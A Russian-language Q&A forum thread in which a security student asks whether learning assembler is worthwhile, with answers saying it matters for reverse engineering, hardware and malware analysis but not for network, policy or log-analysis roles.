@Fardeendragon
Student

Нужен ли ASSEMBLER специалисту по информационной безопасности?

Нужен ли ASSEMBLER специалисту по информационной безопасности?
В данный момент я изучаю язык C++ и учусь на специалиста в информационной безопасности. И вот тут напрашивается вопрос нужно ли мне знать ASSEMBLER?
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования, а другие, как раз таки наоборот утверждают, что он нужен для "общения" с железом.
И все же, если не трудно ответить на этот пост, могли б ещё написать об + и -, данного языка(больно интересно).
  • Вопрос задан
  • 1355 просмотров
Пригласить эксперта
Ответы на вопрос 10
jcmvbkbc
@jcmvbkbc
"I'm here to consult you" © Dogbert
Нужен ли ASSEMBLER специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования...

Нужен ли алфавит специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что алфавит устарел и на замену ему пришли эмодзи...
Ответ написан
CityCat4
@CityCat4 Куратор тега Информационная безопасность
Внимание! Изменился адрес почты!
Если собираетесь заниматься маршрутизаторами, политиками доступа, сетями или допустим написанием правил, руководств, инструкций, анализом логов (тоже нужная, хоть и муторная работа) или допустим аналитикой СМП - тогда скорее всего не нужен.
Если собираетесь заниматься "анти-взломом", железом, микроконтроллерами, вирусами-шифровальщиками и прочими проявлениями "дикого-дикого Запада" - нужен обязательно. Это все равно что специалисту по банковским сейфам спрашивать, а нужно ли ему курсы по приемам вскрытия сейфов :D
Ответ написан
Комментировать
inoise
@inoise
Solution Architect, AWS Certified, Serverless